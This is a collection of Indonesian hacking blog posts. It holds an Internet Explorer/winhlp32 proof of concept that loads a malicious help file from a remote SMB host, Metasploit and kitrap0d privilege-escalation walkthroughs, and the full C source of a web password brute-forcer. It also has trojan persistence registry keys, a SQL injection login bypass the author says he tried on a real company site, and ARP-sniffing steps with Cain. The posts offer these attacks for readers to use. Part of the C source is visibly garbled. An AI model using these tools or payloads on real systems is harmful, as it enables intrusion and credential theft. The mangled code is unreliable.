:::POWER OF TECHNOLOGY:::

Bug Internet Explorer

noreply@blogger.com (BlackSignal) — Thu, 03 Jun 2010 01:19:00 +0000

Atikel berikut ini merupakan artikel yang diusung oleh Kecoak Elektronik yang membahas tentang adanya bug pada intenet Explorer versi 6, 7 dan 8. Kenapa saya memasukkan artikel ini? Karena saya pikir, artikel ini sangatlah penting mengingat pengguna Internet Explorer sangatlah banyak. Berikut artikel selengkapnya...

Pada tanggal 26 February 2010, Maurycy Prodeus mengeluarkan public disclosure terhadap bug internet explorer 6, 7, dan 8 yang dapat di-eksploitasi menggunakan malicious .HLP file. Berikut ini pernyataan dari maurycy,

It is possible to invoke winhlp32.exe from Internet Explorer 8,7,6
using VBScript. Passing malicious .HLP file to winhlp32 could allow
remote attacker to run arbitrary command.
Additionally, there is a stack overflow vulnerability in winhlp32.exe

Intinya, dengan memanfaatkan VBScript maka user dapat meng-ekesekusi winhlp32.exe untuk membuka suatu file bertipe .hlp (windows help file) melalui browser internet explorer 6, 7, 8. Dan jika file .hlp tersebut sudah dimodifikasi sehingga menjadi malicious .hlp maka user dapat di-eksploitasi untuk menjalankan malicious code. Pihak microsoft untuk sementara memasukan ekstensi file .hlp kedalam kategori ‘unsafe file types’.
Untuk men-trigger vulnerability diatas cukup unik dan membutuhkan interaksi dari user untuk menekan tombol F1 ketika MessageBox muncul. Syntax untuk menampilkan MessageBox melalui VBScript sebagai berikut,

MsgBox(prompt[,buttons][,title][,helpfile,context])

Windows help file pada syntax diatas dapat diakses menggunakan samba share, berikut ini PoC dari maurycy untuk men-trigger vulnerability tersebut dan membuat user mengkases malicious .hlp file dari samba share yang telah dipersiapkannya,

'<script type="text/vbscript">

// PoC pertama

big = "\\184.73.14.110\PUBLIC\test.hlp"

MsgBox "please press F1 to save the world", ,"please save the world", big, 1

MsgBox "press F1 to close this annoying popup", ,"", big, 1

<'/script>

PoC tersebut dapat dilihat dari sini.
Jelas terlihat bahwa malicious .hlp file yang digunakan terletak pada \\184.73.14.110\PUBLIC\test.hlp. Ketika user terpancing untuk mengeksekusi maka win32hlp.exe akan berusaha membuka test.hlp tersebut yang justru mengakibatkan eksekusi calc.exe.
Maurycy memberikan PoC tambahan bahwa terdapat bug stack-overflow pada win32hlp.exe ketika mengeksekusi parameter dengan path yang sangat panjang, namun berhubung win32hlp.exe di-compile menggunakan feature /GS maka bug tersebut tidak dapat di-eksploitasi begitu saja.
Saat ini \\184.73.14.110\PUBLIC\test.hlp tidak dapat diakses lagi, namun metasploit sudah memasukan exploit win32hlp tersebut kedalam trunk terbarunya. Ketika tulisan ini dibuat, versi trunk yang dimaksud adalah SVN r8723. Jika kalian penasaran ingin melihat malicious .hlp yang sebelumnya digunakan oleh maurycy, maka dapat melihat dari direktori metasploit di ‘data/exploits/runcalc.hlp’.
Jduck meng-integrasikan exploit tersebut kedalam metasploit framework menggunakan fasilitas WebDAV, sehingga kita tidak perlu membuat samba server untuk dapat diakses oleh target. Dengan beberapa trik yang memanfaatkan protocol WebDAV kita dapat meng-eksploitasi target dengan vulnerability diatas. Kategori eksploit ini masuk dalam ‘browser exploitaion’.
Contoh penggunaannya silahkan lihat DISINI

Sampai saat ini saya masih belum bisa menemukan letak masalah ketika metasploit digunakan dilingkungan Mac OSX, pemanfaatan feature webdav nya tidak berjalan dengan baik. Namun untuk metasploit yang berjalan diatas windows, exploit tersebut berhasil dieksekusi dengan baik seperti pada contoh diatas (anyone tried on linux?).
Exploit ini dapat digunakan pada feature ‘browser autopwn’-nya metasploit, so buat kalian para whitehat mulai dapat menikmati exploit ini untuk ditunjukan pada client saat proses pentest *heh*.
Finish?no. Sebagaimana terlihat dalam judul diatas, ada satu hal lagi yang akan kita bahas .
Pada 19 Januari 2010 yang lalu, tavis ormandy merilis public disclosure yang cukup (sangat?) menghebohkan, terutama bagi para pemerhati dunia security windows. Advisories yang dirilis oleh taviso dapat dilihat dari sini, inti dari advisories tersebut adalah sistem operasi microsoft windows menyimpan bug yang sifatnya 0day sejak tahun 1993. Bug tersebut di-klaim tetap ada sejak rilis Windows NT pada tanggal 27 Juli 1993 hingga implementasi Windows 7 saat ini (semua x86 32-bit windows vulnerable).
Pada saat public disclosure tersebut muncul tidak banyak pihak yang memahami ‘fungsi’-nya, contoh berikut ini ditambahkan dengan tujuan jika memang ada masyarakat indonesia yang belum mengerti (i knew, some of you are lazy to read english reference) maka dapat memahami fungsi dari exploitasi bug tersebut.
Intinya adalah kitrap0d digunakan sebagai local exploit untuk mendapatkan akses system pada windows. Jadi ketika kita berhasil meng-eksploitasi aplikasi dalam microsoft windows, namun akses yang kita dapatkan terbatas dalam arti user yang mengeksekusi adalah user biasa (non-administrator), maka dengan memanfaatkan exploit kitrap0d tersebut kita akan mendapatkan akses system yang tentu saja memberikan akses lebih tinggi.
Contoh paling mudah adalah memanfaatkan browser bug sebagai pintu masuk, seperti yang telah ditunjukan pada contoh diatas (bug win32hlp.exe), kita akan melihat informasi berikut ini:

meterpreter > getuidServer username: XPSP2\user

Hal tersebut didapatkan karena user yang dieksploitasi oleh exploit ie_win32hlp menggunakan user biasa (nama user nya ‘user’) ketika mengeksekusi exploit, dan ini biasanya dilakukan oleh ratusan bahkan ribuan pengguna komputer dalam suatu perusahaan atau organisasi dimana login kedalam windows tidak menggunakan hak akses administrator.
Metasploit mem-bundle exploit kitrap0d dengan meterpreter, sehingga kita dapat dengan mudah melakukan local exploit pada target windows untuk mendapatkan hak akses ’system’ jika paylod yang digunakan adalah meterpreter. Contohnya klik DISINI

Exploit

noreply@blogger.com (BlackSignal) — Sun, 30 May 2010 18:13:00 +0000

Exploit atau exploitasi merupakan sebuah aksi yang memanfaatkan celah atau kelemahan pada sebuah system, bisa juga berupa bug yang terdapat pada system tersebut.

Exploit digunakan untuk menjalankan sebuah perintah yang akan memberikan akses khusus untuk melakukan tujuan tertentu yang tidak dapat dilakukan pada kondisi normal. Exploit sendiri deprogram dengan menggunakan bahasa C, perl, atau sh. Untuk mendapatkan exploit itu tidaklah susah, banyak sekali situs yang menyediakannya. Sebut saja milworm, antionline, packetstormsecurity, dll.

Exploit bisa dibedakan kedalam dua kategori,

Exploit Lokal

Exploit lokal dapat dilakukan hanya apabila seseorang memiliki hak akses untuk menggunakan sebuah sistem, atau exploit yang hanya digunakan pada kompuer itu sendiri. Contoh exploit lokal

- Buffer Overflow

- Race Conditions

Remote Exploit

Remote exploit dapat terjadi dimana seseorang bisa mengeksploitasi sistem tanpa harus mengetahui username dan password, atau exploit yang dapat dieksekusi dari jarak jauh. Biasanya remote exploit bisa jadi lokal exploit walaupun tidak sebaliknya.

Berikut ini saya berikan sebuah contoh exploit yang cukup terkenal yaitu brute_ssl. Exploit ini dibuat untuk mengilustrasikan sebuah kelemahan pada HTTP Basic Authorization. Protokol HTTP mengizinkan user untuk keluar dengan membuat banyak guest. Exploit ini akan terkoneksi dengan web server yang secure ataupun yang umum dan mencoba untuk mengalikan kombinasi username dan password sampai ditemukan yang tepat.

Untuk melakukannya diperlukan liberary SSLeay yang bisa didapatkan dari ftp://ftp.psy.ug.oz.au/pub/crypto/SSL/ ini bekerja pada SSLeay – 0.8.0 setelah di build, jalankan dengan perintah:

Cc –o brute_ssl –l/usr/local/ssl/include brute_ssl.c \

-l /usr/local/ssl/lib –lssl –lcrypto

Jalankan binary tanpa argument apapun untuk melihat parameternya.

Berikut scriptnya:

</code>/* * * Brute Web (SSL) v2.0 * Coded by BeastMaster V * September 13,1997 * * [NOTES] * This program was written to illustrate what I see as * a weakness with HTTP Basic Authorization. The HTTP protocol * let's you get away with making as many guesses as you * wish to make when it comes to Basic Authorization. This * program will connect to a regular or secure web server and * try multiple username/password combinations until it finds * the right one and prints out what the username and password * was for the protected realm. I have only tested this on * Linux, so you might have to do a little porting to get it * to work on other platforms. It should be simple though. * * [HOWTO] * To get up and running, you will first need to ftp the SSLeay * libraries from ftp://ftp.psy.uq.oz.au/pub/Crypto/SSL/ * This was written to work with SSLeay-0.8.0. Now after you * get this compiled and installed, you can build this program * with a command like: * cc -o brute_ssl -I/usr/local/ssl/include brute_ssl.c \ * -L/usr/local/ssl/lib -lssl -lcrypto * Run the binary without any arguments to see the parameters * that the program takes. * * [COMMENTS] * All comments, gripes, flames, etc. should be sent to * bryan@scott.net * * [DISCLAIMER] * I am not responsible for anything you do with this, * so please use this program in a responsible manner. * * [WARNING] * If the webserver you are using this on does logging, then * it will be quite obvious that you are attacking. * */ #include <errno.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <stdarg.h> #include <sys/types.h> #include <sys/time.h> #include <sys/ioctl.h> #include <sys/socket.h> #include <netinet/in.h> #include <netdb.h> #include <unistd.h> #include <fcntl.h> #include <signal.h> #include <rsa.h> #include <crypto.h> #include <x509.h> #include <pem.h> #include <ssl.h> #include <err.h> extern int errno, h_errno; #define SPACELEFT(buf,ptr) (sizeof buf-((ptr)-buf)) #define newstr(s) strcpy(malloc(strlen(s)+1),s) #define HTTPD_UNAUTHORIZED 401 #define FL __FILE__,__LINE__ #define MAXDICTWORD 64 #define MAXNAMEPASSLEN 128 #define MAXENCODEDSTRING 256 #define MAXSENDSTRING 300 #define HAS_DICTIONARY 0x0001 #define HAS_USERNAME 0x0002 #define HAS_PORTNUMBER 0x0004 #define HAS_HOSTNAME 0x0008 #define HAS_VERBOSE 0x0010 #define HAS_SSL_OPT 0x0020 #define HAS_REALM 0x0040 #define HAS_DONE_IT 0x0080 #if SSLEAY_VERSION_NUMBER >= 0x0800 #define SSLEAY8 #endif char alphabet[]="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"; char *prg_nme; int mask; struct BASE64_PARAMS { unsigned long int accum; int shift; int save_shift; }; /* BeastMaster V's error logging function */ void proc_err(char *func,char *file,int line,const char *fmt, ...) { va_list args; if (prg_nme!=NULL) fprintf(stderr,"[%s]", prg_nme); va_start(args, fmt); fprintf(stderr," %s() ",func); fprintf(stderr,"<file:%s> : ",file,line); vfprintf(stderr, fmt, args); fputc('\n', stderr); fflush(stderr); va_end(args); } /* an implementation of signal() based on sigaction() */ void (*r_signal(int sig,void(*func)())) (int) { struct sigaction act, oact; act.sa_handler = func; sigemptyset(&act.sa_mask); act.sa_flags = 0; #ifdef SA_RESTART act.sa_flags |= SA_RESTART; #endif if (sigaction(sig, &act, &oact) < i="0,done=" i="=" w="SSL_read(ssl_con,tmp,1);" w="=" done="1;" i="0," done="0;" i="=" w="read(s" w="=" done =" 1;" z="0;" index =" 0;">shift!=0)) { if ((*(string_to_encode+z))&&(quit==0)) { blivit = *(string_to_encode +z); z++; if (*(string_to_encode+z)==0) { quit = 1; e_p->save_shift=e_p->shift; blivit=0; } } else { quit=1; e_p->save_shift=e_p->shift; blivit=0; } if ((quit==0)||(e_p->shift!= 0)) { value=(unsigned long)blivit; e_p->accum <<= 8; e_p->shift += 8; e_p->accum |= value; } while (e_p->shift >= 6) { e_p->shift -= 6; value = (e_p->accum >> e_p->shift) & 0x3Fl; blivit = alphabet[value]; *(buf_64+(index++)) = blivit; if (index >= 60) { *(buf_64+index)='\0'; index = 0; } if ( quit != 0 ) e_p->shift = 0; } } if (e_p->save_shift==2) { *(buf_64+(index++))='='; if (index>=60) { *(buf_64+index)='\0'; index=0; } *(buf_64+(index++))='='; if (index>=60 ) { *(buf_64+index)='\0'; index=0; } } else if (e_p->save_shift==4) { *(buf_64+(index++))='='; if (index>=60) { *(buf_64+index)='\0'; index=0; } } if (index!=0) *(buf_64+index)='\0'; return quit; } /* takes string to encode and a user supplied buffer as parameters */ void encode_string (char *name_pass,char *buf_64) { struct BASE64_PARAMS e_p; int quit=0; register int i; char s[MAXNAMEPASSLEN+3]; e_p.shift = 0; e_p.accum = 0; sprintf(s,"%s%c",name_pass,*(name_pass+strlen(name_pass)-1)); base64_encode(quit, &e_p, s,buf_64); return; } /* check the web server's HTTP response headers */ short check_response (char *response) { short ScanCount; int httpd_code; short version; ScanCount=sscanf(response,"HTTP/1.%d %d",&version,&httpd_code); if (ScanCount!=2) return 0; if (httpd_code==HTTPD_UNAUTHORIZED) return 0; else return 1; } /* reads a line from a file */ short read_line(FILE *fp, char *buf) { int c; short done=0; short i=0; while (!done) { c=fgetc(fp); if (c==EOF) return 0; if (c=='\n') { done=1; break; } if (c) *(buf+i)=c; i++; } *(buf+i)='\0'; return i; } void terminate (int sig) { proc_err("terminate",FL,"[%s] has caught %d (%s)", prg_nme,sig,(sig==SIGINT)?"SIGINT":"SIGSEGV"); exit(EXIT_FAILURE); } /* creates a TCP socket and connects it to a peer */ int make_socket(char *in_host,unsigned short port_num) { int sd, err; struct hostent *hp=NULL; struct sockaddr_in sa; sd=socket(AF_INET, SOCK_STREAM, 0); if (sd==-1) { proc_err("make_socket",FL,"Could not create socket->%s",strerror(errno)); exit(EXIT_FAILURE); } hp=gethostbyname(in_host); if (!hp) { if (h_errno==HOST_NOT_FOUND) proc_err("make_socket",FL,"Could not resolv [%s]->Host not Found",in_host); else proc_err("make_socket",FL,"Cound not resolv [%s]->DNS error",in_host); exit(EXIT_FAILURE); } bzero(&sa,sizeof(sa)); sa.sin_family=hp->h_addrtype; bcopy(hp->h_addr,(char *)&sa.sin_addr,hp->h_length); sa.sin_port=htons(port_num); err=connect(sd, (struct sockaddr *)&sa,sizeof(sa)); if (err==-1) { proc_err("make_socket",FL,"connect() call failed->%s",strerror(errno)); exit(EXIT_FAILURE); } return sd; } /* prints the program usage */ void print_usage() { int x; char messages[][255] = { "\n\t'%s [options]'\n\n", "Options:\n", "\t-v <optional> verbose mode (print responses to stdout)\n", "\t-z <optional> SSL flag (use this for secure servers)\n", "\t-d dictionary file (full path to dictionary file)\n", "\t-u username (a user on the target webserver)\n", "\t-h hostname (host running the webserver)\n", "\t-p portnumber (port that the webserver runs on)\n", "\t-r realm (the full path to the protected realm)\n\n", "Example:\n", "\tSay everytime I type https://www.somewhere.com/protected\n", "\tinto netscape, a box pops up and asks me to enter in a\n", "\tUser ID and password. Well, I have no idea what User ID\n", "\tor password to enter in, so I'll try to 'guess' my way in.\n", "\tI have a dictionary file in /tmp/dict.txt. Next I'll guess\n", "\ta username of \"foo\". Now I can type a command like:\n", "\n", " %s -z -d /tmp/dict.txt -u foo -h www.somewhere.com -p 443 -r /protected\n", "\n", "\tNow with any luck I'll eventually see a username and password.\n", "\ti.e: ----USERNAME=foo PASSWORD=foopass----\n\n", "\0" }; fprintf(stderr,"\n-- Brute Web (SSL) v2.0 --\n"); for(x=0; *messages[x]!='\0';x++) fprintf(stderr, messages[x], prg_nme); } /* brute_ssl */ int main (unsigned int argc,char **argv, char **envp) { int err=0, sd,in_port=0, try=0; char c, *export_buf=NULL; SSL *ssl_con=NULL; SSL_CTX *ssl_ctx=NULL; unsigned long ssl_err; FILE *dict_fd=NULL; char *dict_name=NULL,*in_host=NULL; char *user=NULL,*realm=NULL, *dict_word=NULL; char *name_pass_buf=NULL, *encoded_buf=NULL; char *p_title=NULL; if ((prg_nme=strrchr(argv[0],'/'))) ++prg_nme; else prg_nme=argv[0]; mask=0; while((c=getopt(argc,argv,"vzd:u:h:p:r:"))!=EOF) { switch(c) { case 'v': mask|=HAS_VERBOSE; break; case 'z': mask|=HAS_SSL_OPT; break; case 'd': dict_name=optarg; mask|=HAS_DICTIONARY; break; case 'u': user=optarg; mask|=HAS_USERNAME; break; case 'h': in_host=optarg; mask|=HAS_HOSTNAME; break; case 'p': in_port=atoi(optarg); if (!in_port) err++; mask|=HAS_PORTNUMBER; break; case 'r': realm=optarg; mask|=HAS_REALM; break; case '?': err++; } } if ((optind<argc)||err) dict_word="(char">%s",strerror(errno)); exit(EXIT_FAILURE); } name_pass_buf=(char *)malloc(MAXNAMEPASSLEN); if (!name_pass_buf) { proc_err("main",FL,"Call to malloc() failed->%s",strerror(errno)); exit(EXIT_FAILURE); } encoded_buf=(char *)malloc(MAXENCODEDSTRING); if (!encoded_buf) { proc_err("main",FL,"Call to malloc() failed->%s",strerror(errno)); exit(EXIT_FAILURE); } export_buf=(char *)malloc(MAXSENDSTRING); if (!export_buf) { proc_err("main",FL,"Call to malloc() failed->%s",strerror(errno)); exit(EXIT_FAILURE); } dict_fd=fopen(dict_name,"r"); if (dict_fd==NULL) { proc_err("main",FL,"Could not open dictionary file->%s",strerror(errno)); exit(EXIT_FAILURE); } if (mask & HAS_SSL_OPT) { SSLeay_add_ssl_algorithms(); SSL_load_error_strings(); ssl_ctx = SSL_CTX_new(SSLv2_client_method()); if (!ssl_ctx) { proc_err("main",FL,"Call to SSL_CTX_new return a NULL"); exit(EXIT_FAILURE); } } while (read_line(dict_fd,dict_word)) { sd=make_socket(in_host,in_port); if (mask & HAS_SSL_OPT) { ssl_con=SSL_new(ssl_ctx); if (!ssl_con) { proc_err("main",FL,"SSL_new() returned NULL."); exit(EXIT_FAILURE); } SSL_set_fd (ssl_con, sd); ssl_err=SSL_connect(ssl_con); if (ssl_err<=0) { ssl_err=ERR_get_error(); proc_err("main",FL,"SSL_connect() failed->%s\n", ERR_error_string(ssl_err,export_buf)); exit(EXIT_FAILURE); } } sprintf(name_pass_buf,"%s:%s",user,dict_word); encode_string(name_pass_buf,encoded_buf); sprintf(export_buf,"GET %s HTTP/1.0\nAuthorization: Basic %s\n\n",realm, encoded_buf); try++; if (mask & HAS_SSL_OPT) { SSL_write(ssl_con,export_buf,strlen(export_buf)); SSL_readln(ssl_con,export_buf,MAXSENDSTRING-1); if (mask & HAS_VERBOSE) fprintf(stdout,"\n==[Pass # %d]============\n%s",try, export_buf); } else { write(sd,export_buf,strlen(export_buf)); socket_readln(sd,export_buf,MAXSENDSTRING-1); if (mask & HAS_VERBOSE) fprintf(stdout,"\n==[Pass # %d]============\n%s",try, export_buf); } if (check_response(export_buf)) { mask |=HAS_DONE_IT; break; } if (mask & HAS_VERBOSE) { if (mask & HAS_SSL_OPT) { while(SSL_readln(ssl_con,export_buf,MAXSENDSTRING-1)) fprintf(stdout,"%s",export_buf); } else { while(socket_readln(sd,export_buf,MAXSENDSTRING-1)) fprintf(stdout,"%s",export_buf); } } close(sd); if (mask & HAS_SSL_OPT) SSL_free(ssl_con); } if (mask & HAS_DONE_IT) fprintf(stdout,"\n\n\t----USERNAME=%s PASSWORD=%s----\n\n",user,dict_word); else fprintf(stdout,"\n\n\t----Sorry, but I could not get in.----\n"); free(dict_word); free(name_pass_buf); free(export_buf); if (mask & HAS_SSL_OPT) SSL_CTX_free(ssl_ctx); } <code>

Script diatas bisa anda dapatkan Disini

Perang Raksaksa Produsen Prosesor

noreply@blogger.com (BlackSignal) — Wed, 20 May 2009 14:43:00 +0000

Intel Corel7 Codename Nehalem (Corel7 920, 924, / Corel7 EE 965)

Prosessor ini resmi diluncurkan bulan November 2008, sebenarnya apa saja tenologi baru yang ada pada Corel7 yang diklain "prosesor tercepat di dunia ini"?

- INTEL QPI (QuickPathInterconnect) teknologi yang menggantikan sistem FSB pada prosesor Core2Duo, sehingga Corel7 ini koneksi data antar modul memori dengan prosesor dapat berjalan lebih cepat dan dengan bandwidth lebih.
- 4 Core prosesor dengan 2thread pada masing-masing core, sehingga Corel7 ini memiliki total 8thread, dengan Vista kita akan mendapatkan 8 prosesor dalam 1 keping prosesor.
- Integrated MCH dengan 3 channels DDR3 1066MHZ.
- Fabrikasi 45 nm, cache 8Mb, TDP 130W, QPI 4.8 / 6,4GT/s, socket LGA 1366 untuk saat ini hanya ada 1 chipset yang benar-benar kompatibel dengan prosesor tercepat di INTEL ini, yaitu Intel X 58 Exp Chipset dengan ICH 10/10R pada SouthBridge nya.

AMD Phenom Generasi ke-2
- AMD 64 with Direct Connect Architecture, meningkatkan system performance dengan menghubungkan secara langsung prosesor, memori kontroler, dan input output kedalam keping prosesor.
- Balance Smart Cache, menyediakan cache yang cukup untuk semua core
- Integrated DDR2 DRAM Controller with AMD Memory Optimizer Technology
- AMD Cool n Quiet 3.0 technology
- Dual Dynamic Power Management, managemen power untuk efisiensi daya pada core prosesor dan memori kontroler
- Fabrikasi 45nm, cache 8Mb, TDP 125W, HT 3.6GT/s, Socket AM2+

Diambil dari : Fasta News 09

Berkenalan Dengan Trojan Horse

noreply@blogger.com (BlackSignal) — Wed, 20 May 2009 14:05:00 +0000

Nama Trojan Horse diambil dari mitologi Yunani pada saat perang Troya. Waktu itu pasukan yunani kesulitan untuk melumpuhkan kota troya karena troya memiliki kekuatan yang sangat tangguh. Akhirnya, sebuah strategi dijalankan. Pasukan yunani membuat seekor kuda raksasa yang terbuat dari kayu yang didalamnya diisi oleh pasukan yunani, sementara itu pasukan yunani yang lain bergerak mundur. Berkat bantuan Sinon, seorang spionase yunani, kuda kayu tersebut berhasil dibawa kedalam kota troya. Dan pada malam harinya, pasukan yang mengisi kuda kayu tersebut keluar untuk membuka pintu gerbang troya sehingga pasukan yunani yang sebelumnya berpura-pura mundur bisa masuk dan melumpuhkan kota tersebut.
Lalu apa hubungannya antara kuda troya di jaman yunani dengan trojan horse yang dianggap sebagai hewan komputer yang membahayakan?
Ada kesamaan antara strategi kuda troya di jaman yunani dengan konsep yang digunakan trojan horse, yaitu sama-sama mengirimkan media ke korbannya.
Salah satu ciri dari trojan adalah selalu mempunyai 2 bagian yaitu client dan server. Dari program client kita bisa mengendalikan program server yang ditanam di komputer korban. Alhasil, komputer korban dapat kita kendalikan dari jarak jauh (remote).
Cara kerja trojan adalah dengan menggunakan protokol TCP/IP atau adapula beberapa varian trojan yang menggunakan protokol UDP. Ketika server mulai dijalankan pada komputer korban, trojan akan menyembunyikan diri didalam sistem. Biasanya trojan akan bersembunyi pada lokasi:
1. Start-Up Directory
2. Registry -
HKLM\Software\Windows\Microsoft\CurrentVersion\Run
HKLM\Software\Windows\Microsoft\CurrentVersion\RunServices
HKLM\Software\Windows\Microsoft\CurrentVersion\RunOnce
HKLM\Software\Windows\Microsoft\CurrentVersion\RunServicesOnce
HKEY_CLASSES_ROOT\exefile\shell\open\command"%1"%*
3. Batch File
4. Initialization File
5. C:\Explorer.exe
Selain lokasi-lokasi diatas, ada kemungkinan trojan bersembunyi ditempat lain seperti yang dilakukan oleh SubSeven 2.2 yang bersembunyi di:
HKEY_LOCAL_MACHINE\Software\Microsoft\ActiveSetup\Installed Component
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer|Usershell folders

Salah satu contoh trojan yang memiliki fitur cukup mumpuni dan masih banyak digunakan hingga saat ini adalah NetBus. Beberapa fitur tersebut, diantaranya:
- fungsi keylogger
- download dan menghapus file komputer korban
- shutdown sistem
- screendump (fitur ini membutuhkan koneksi cepat)
- menonaktifkan keyboard
- mengalihkan data pada port TCP tertentu ke host atau port lain
- konfigurasi server.exe dengan pilihan port TCP dan notifikasi email
- dll

Seiring dengan perkembangan, trojanpun terus memperbaiki diri. Salah satu trojan yang telah berevolusi adalah AWRC (atelier Web Remote Commander). Trojan yang satu ini dikatakan telah berevolusi karena ia tidak lagi membutuhkan file server untuk ditanam di komputer korban, artinya trojan ini hanya memiliki satu file client dan itu cukup untuk mengendalikan komputer korban.

Beberapa hal yang bisa dilakukan untuk meminimalisir agar tidak menjadi korban trojan, antara lain:

Pasanglah Freezer : Freezer akan mengembalikan sistem pada keadaan semula seperti saat pertama kali freezer ini diaktifkan.
Update Antivirus : Sebagian besar antivirus yang beredar mampu memblokir kerja trojan.
Tasklist : Mendeteksi dengan cara melihat daftar program yang sedang berjalan atau anda bisa membuka msinfo32.exe (C:\Program Files\common files\microsoft shared\msinfo) untuk melihat daftar program yang sedang running tapi menyembunyikan diri dari tasklist.
Netstat : Perintah ini berfungsi untuk membuka koneksi ke dan dari komputer seseorang, dengan menjalankan perintah ini, akan menampilkan IP address dari komputer tersebut ke komputer lain yang terhubung.
TCP View: Free utility dari sysinternals, utility ini dapat menampilkan IP address dan menampilkan program yang digunakan oleh orang lain untuk melakukan koneksi dengan komputer kita.

Tool Berbahaya Bagi Windows

noreply@blogger.com (BlackSignal) — Mon, 02 Feb 2009 14:21:00 +0000

Sering kali kita tergiur begitu melihat fitur yang ditawarkan oleh sebuah software, tanpa memperhatikan kualitas dari software itu sendiri. Padahal bukan tidak mungkin software yang kita download (baik itu free ataupun yang berbayar) merupakan sebuah software di program dengan buruk (Parameter buruk tidak nya pemrograman sebuah tool, menurut para analis software dapat dilihat dari seberapa besar kesalahan pemrogramannya pada 1000 baris kode pertama, dan batas kewajaran untuk sebuah software adalah dua baris sedangkan pada software server tidak boleh melebihi dari setengah baris) dan dikategorikan sebagai software yang berbahaya. Dikategorikan berbahaya karena dapat memperlambat kinerja pc atau lebih parah lagi dapat merusak windows.

Salah satu contoh dari software yang dikategorikan berbahaya adalah Smart PC Profesional.

Tools ini memiliki fungsi merapikan registry, tetapi ia tidak membackup file registry terlebih dahulu, akibatnya bila terjadi kesalahan, sistem akan rusak selamanya. Selain itu, tools ini ingin menghapus nilai-nilai untuk fonts yang terintegrasi dalam sistem. Hal yang sama terjadi jika tools ini berhadapan dengan file .DLL program yang aktif dan folder backup Service Pack. Tools ini juga menggolongkan file backup "boot.bak" dan "bootsec.bak" sebagai file junk. Padahal file-file tersebut mengamankan boot windows bila file-file asli dengan ekstensi .INI rusak. Melalui fungsi "Windows Boots", tool ini juga mengacaukan kinerja RAM.

Tools lain yang dikategorikan sebagai tools berbahaya adalah:
1. SpyEraser: tools ini menghapus registry key yang dianggap sebagai spyware.
2. GpartEd: dapat merusak sistem pada vista.
3. Nimo Codec Pack: Tidak memiliki pengaturan filter sehingga dapat menurunkan kualitas secara drastis

Sebenarnya, masih ada beberapa tools yang dikategorikan sebagai tools berbahaya. Berikut ini tool ternama yang memiliki celah keamanan terbanyak pada tahun 2007.
1. Yahoo Messenger 8.2.0.239
2.Apple QuickTime 7.2
3. Mozilla Firefox 2.0.0.6
4. Windows Messenger 7.0 & 8.0
5. Mware Player 2.0 & 1.0.4
6. Apple iTunes 7.3.2
7. Intuit QuickBooks Online Edition 9
8. Java Runtime 1.0.6_X
9. Yahoo Widgets 4.0.5
10. Ask.com Toolbar 4.0.2.53

Tulisan ini diambil dari majalah Chip edisi tahun 08

SQL Injection

noreply@blogger.com (BlackSignal) — Thu, 08 Jan 2009 04:17:00 +0000

Kali ini kita akan membicarakan sedikit tentang SQL Injection, disini kita akan membahas tentang kemungkinan celah untuk melakukan penyerangan melalui SQL Injection. Berbeda dengan penyerangan XSS yang berdampak pada pengunjung sebuah situs, penyerangan SQL Injection langsung menyerang pada situs itu sendiri dan tentu saja yang menjadi sasaran adalah database nya.
Saya akan mengambil contoh situs BUMN yang cukup besar. Walaupn data yang kita peroleh dari contoh berikut bukan sesuatu yang teramat penting, tapi dari sini kita bisa melihat bahwa para administrator masih banyak yang lalai terhadap sisi keamanan dan kredibilitas baik admin ataupun perusahaan menjadi taruhannya.

Pada form login kita masukkan ' or ' dan hal serupa kita masukkan pada field password

hasilnya akan tampak seperti berikut

atau kita ambil contoh kode lainnya

' or ' ='

mengapa bisa demikian?
Pada form login, pada umumnya statment nya sebagai berikut:

SELECT * FROM tabel WHERE field_username = input _username AND field_password = input_password

begitu kita mengekseskusi ' or ' =' maka perintahnya akan menjadi

SELECT * FROM tabel WHERE field_username "or"='' AND field_password = ''OR'' = ''

Logika OR menyebab kan perintah SQL selalu mengembalikan nilai true sehingga sistem akan mengizinkan anda masuk ke wilayah yang seharusnya dimasuki oleh member atau admin.

Untuk bahan percobaan, silahkan gunakan sebuah sistem yang memang dibuat dengan celah keamanan dari sisi SQL Injection sangat terbuka. Anda bisa sedot dari www.foundstone.com/us/resourse-free-tools.asp dengan nama file hacmebank atau hacmebank2_source.zip

Hal yang perlu anda persiapkan untuk menjalankan sistem tersebut adalah:
1. Microsoft.NET Framework v1.1
2. Microsoft IIS
3. MSDE 2000Release A

Sebenarnya, banyak hal yang bisa dilakukan untuk aksi penyerangan melalui SQL Injection, namun disini saya hanya ingin membahas tentang apa itu SQL Injection seperti apa alur logika nya dan cara yang saya gunakan di atas adalah cara yang biasa dilakukan untuk penetrasi awal. Jadi untuk hal-hal yang lebih lanjut anda bisa googling untuk mendapatkan cara ataupun cheat code nya.

Lantas apa yang bisa dilakukan untuk mencegah hal tersebut?
1. kesadaran individu terhadap keamanan akan sistem yang dikelolanya dalam hal ini sang admin. Umumnya username menggunakan id "admin", cobalah ganti dengan 4Dm1n atau sebagainya, hal ini dimaksudkan agar tidak mudah ditebak
2. lakukan penyaringan pada field, batasi jumlah karakter hanya pada a-z, A-Z, 1-0, ("_","@","." bila anda menggunakan id dengan email), tolak karakter khusus seperti *, &, ' dsb.
3. Anda bisa menggunakan tools dari pihak ketiga untuk menguji sistem yang anda buat.
4. perhatikan script dan syntax nya.
5. dll

Sniffing Dengan Cain Part II

noreply@blogger.com (BlackSignal) — Sat, 20 Dec 2008 19:58:00 +0000

kPada tulisan ini, saya hanya menyambung bahasan tentang cain yang pernah dibicarakan sebelumnya. Untuk mendapatkan tool nya silahkan sedot di http://oxid.it/cain.html, jadi untuk mengetahui tentang fungsi-fungsinya silahkan baca pada tulisan sebelumnya.

1. Klik Configure, kemudian akan muncul

Klik Ok

2. Klik tombol Start/Stop sniffer
3. Klik tombol Start/Stop APR
4. Klik tab Sniffer

Simpel, kan? Yang perlu diperhatikan ialah configurasi dari jaringan itu sendiri, hal ini berhubungan dengan sang admin dalam membangun jaringannya.
Pada tulisan sebelumnya, saya menganjurkan untuk melakukan ping terhadap kompy target, dengan tujuan supaya komputer kita terhubung dengan komputer target.

Sebenarnya, untuk melakukan komunikasi dengan komputer target, bukan hanya pinging yang bisa kita lakukan, anda bisa menggunakan Yahoochecker, selain nyari username dan password kita juga bisa memonitor target, barangkali dia sedang chat di YM.

